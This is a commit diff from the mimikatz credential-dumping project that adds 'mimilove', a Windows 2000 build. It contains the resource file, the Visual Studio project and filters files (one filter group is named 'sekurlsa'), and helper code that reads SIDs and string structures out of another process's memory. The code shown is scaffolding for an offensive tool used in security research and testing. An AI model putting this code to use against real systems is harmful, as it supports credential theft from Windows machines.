BLOCK "StringFileInfo"
BEGIN
BLOCK "040904b0"
BEGIN
VALUE "ProductName", "mimilove"
VALUE "ProductVersion", "1.0.0.0"
VALUE "CompanyName", "gentilkiwi (Benjamin DELPY)"
VALUE "FileDescription", "mimilove for Windows 2000"
VALUE "FileVersion", "1.0.0.0"
VALUE "InternalName", "mimilove"
VALUE "LegalCopyright", "Copyright (c) 2007 - 2015 gentilkiwi (Benjamin DELPY)"
VALUE "OriginalFilename", "mimilove.exe"
VALUE "PrivateBuild", "Build with love for POC only"
VALUE "SpecialBuild", "kiwi flavor !"
END
END
BLOCK "VarFileInfo"
BEGIN
VALUE "Translation", 0x0409, 1200
END
END

99
mimilove/mimilove.vcxproj Normal file
View File

@ -0,0 +1,99 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{60D02E32-1711-4D9E-9AC2-10627C52EB40}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>mimilove</RootNamespace>
<SccProjectName>Svn</SccProjectName>
<SccAuxPath>Svn</SccAuxPath>
<SccLocalPath>Svn</SccLocalPath>
<SccProvider>SubversionScc</SccProvider>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Label="Configuration">
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v100</PlatformToolset>
<PlatformToolset Condition="'$(VCTargetsPath11)' != ''">v110_xp</PlatformToolset>
<PlatformToolset Condition="'$(VCTargetsPath12)' != ''">v120_xp</PlatformToolset>
<UseOfMfc>static</UseOfMfc>
</PropertyGroup>
<PropertyGroup Label="Configuration" Condition="Exists('$(VCTargetsPath)\Platforms\$(Platform)\PlatformToolsets\ddk2003') Or Exists('$(VCTargetsPath)\..\Platforms\$(Platform)\PlatformToolsets\ddk2003')">
<PlatformToolset>ddk2003</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<PropertyGroup>
<OutDir>$(SolutionDir)$(Platform)\</OutDir>
<IntDir>$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<IncludePath>$(SolutionDir)inc;$(IncludePath)</IncludePath>
<LibraryPath>$(SolutionDir)lib\$(Platform);$(LibraryPath)</LibraryPath>
</PropertyGroup>
<ItemDefinitionGroup>
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<Optimization>Full</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>false</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;MIMIKATZ_W2000_SUPPORT;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<InlineFunctionExpansion>AnySuitable</InlineFunctionExpansion>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<OmitFramePointers>true</OmitFramePointers>
<StringPooling>true</StringPooling>
<ExceptionHandling>false</ExceptionHandling>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FloatingPointModel>Fast</FloatingPointModel>
<FloatingPointExceptions>false</FloatingPointExceptions>
<CreateHotpatchableImage>false</CreateHotpatchableImage>
<ErrorReporting>None</ErrorReporting>
<TreatWarningAsError>true</TreatWarningAsError>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<AdditionalDependencies>advapi32.lib;ntdll.min.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AssemblyDebug>false</AssemblyDebug>
<DataExecutionPrevention>true</DataExecutionPrevention>
<LinkErrorReporting>NoErrorReport</LinkErrorReporting>
<ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
</Link>
</ItemDefinitionGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ItemGroup>
<ClCompile Include="..\modules\kull_m_kernel.c" />
<ClCompile Include="..\modules\kull_m_memory.c" />
<ClCompile Include="..\modules\kull_m_minidump.c" />
<ClCompile Include="..\modules\kull_m_output.c" />
<ClCompile Include="..\modules\kull_m_process.c" />
<ClCompile Include="..\modules\kull_m_string.c" />
<ClCompile Include="mimilove.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\modules\kull_m_kernel.h" />
<ClInclude Include="..\modules\kull_m_memory.h" />
<ClInclude Include="..\modules\kull_m_minidump.h" />
<ClInclude Include="..\modules\kull_m_output.h" />
<ClInclude Include="..\modules\kull_m_process.h" />
<ClInclude Include="..\modules\kull_m_string.h" />
<ClInclude Include="mimilove.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="mimilove.rc" />
</ItemGroup>
</Project>

56
mimilove/mimilove.vcxproj.filters Normal file
View File

@ -0,0 +1,56 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<ClCompile Include="mimilove.c" />
<ClCompile Include="..\modules\kull_m_output.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_process.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_memory.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_string.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_minidump.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_kernel.c">
<Filter>common modules</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="mimilove.h" />
<ClInclude Include="..\modules\kull_m_output.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_process.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_memory.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_string.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_minidump.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_kernel.h">
<Filter>common modules</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<Filter Include="common modules">
<UniqueIdentifier>{7cb872e7-a52b-4394-a979-fd7a0a89d729}</UniqueIdentifier>
</Filter>
<Filter Include="sekurlsa">
<UniqueIdentifier>{22523588-1016-45eb-b8d6-cc8f2763c695}</UniqueIdentifier>
</Filter>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="mimilove.rc" />
</ItemGroup>
</Project>

2
modules/kull_m_process.c
View File

@ -374,6 +374,7 @@ BOOL kull_m_process_peb(PKULL_M_MEMORY_HANDLE memory, PPEB pPeb, BOOL isWOW)
switch(memory->type)
{
#ifndef MIMIKATZ_W2000_SUPPORT
case KULL_M_MEMORY_TYPE_OWN:
if(!isWOW)
{
@ -381,6 +382,7 @@ BOOL kull_m_process_peb(PKULL_M_MEMORY_HANDLE memory, PPEB pPeb, BOOL isWOW)
status = TRUE;
break;
}
#endif
case KULL_M_MEMORY_TYPE_PROCESS:
if(NT_SUCCESS(NtQueryInformationProcess(hProcess, info, buffer, szBuffer, &szInfos)) && (szInfos == szBuffer) && processInformations.PebBaseAddress)
{

30
modules/kull_m_string.c
View File

@ -42,6 +42,36 @@ BOOL kull_m_string_getUnicodeString(IN PUNICODE_STRING string, IN PKULL_M_MEMORY
return status;
}
BOOL kull_m_string_getSid(IN PSID * pSid, IN PKULL_M_MEMORY_HANDLE source)
{
BOOL status = FALSE;
BYTE nbAuth;
DWORD sizeSid;
KULL_M_MEMORY_HANDLE hOwn = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aDestin = {&nbAuth, &hOwn};
KULL_M_MEMORY_ADDRESS aSource = {(PBYTE) *pSid + 1, source};
*pSid = NULL;
if(kull_m_memory_copy(&aDestin, &aSource, sizeof(BYTE)))
{
aSource.address = (PBYTE) aSource.address - 1;
sizeSid = 4 * nbAuth + 6 + 1 + 1;
if(aDestin.address = LocalAlloc(LPTR, sizeSid))
{
*pSid = (PSID) aDestin.address;
status = kull_m_memory_copy(&aDestin, &aSource, sizeSid);
}
}
return status;
}
void kull_m_string_MakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, BOOL relative)
{
if(String->Buffer)
String->Buffer = (PWSTR) ((ULONG_PTR)(String->Buffer) + ((relative ? -1 : 1) * (ULONG_PTR)(BaseAddress)));
}
BOOL kull_m_string_copyUnicodeStringBuffer(PUNICODE_STRING pSource, PUNICODE_STRING pDestination)
{
BOOL status = FALSE;

5
modules/kull_m_string.h
View File

@ -43,8 +43,13 @@ extern NTSTATUS NTAPI RtlValidateUnicodeString(IN ULONG Flags, IN PCUNICODE_STRI
extern NTSTATUS WINAPI RtlAppendUnicodeStringToString(IN OUT PUNICODE_STRING Destination, IN PCUNICODE_STRING Source);
extern VOID NTAPI RtlRunDecodeUnicodeString(IN BYTE Hash, IN OUT PUNICODE_STRING String);
extern VOID NTAPI RtlRunEncodeUnicodeString(IN OUT PBYTE Hash, IN OUT PUNICODE_STRING String);
BOOL kull_m_string_suspectUnicodeStringStructure(IN PUNICODE_STRING pUnicodeString);
BOOL kull_m_string_getUnicodeString(IN PUNICODE_STRING string, IN PKULL_M_MEMORY_HANDLE source);
BOOL kull_m_string_getSid(IN PSID * pSid, IN PKULL_M_MEMORY_HANDLE source);
void kull_m_string_MakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, BOOL relative);
BOOL kull_m_string_copyUnicodeStringBuffer(PUNICODE_STRING pSource, PUNICODE_STRING pDestination);
void kull_m_string_freeUnicodeStringBuffer(PUNICODE_STRING pString);
BOOL kull_m_string_suspectUnicodeString(IN PUNICODE_STRING pUnicodeString);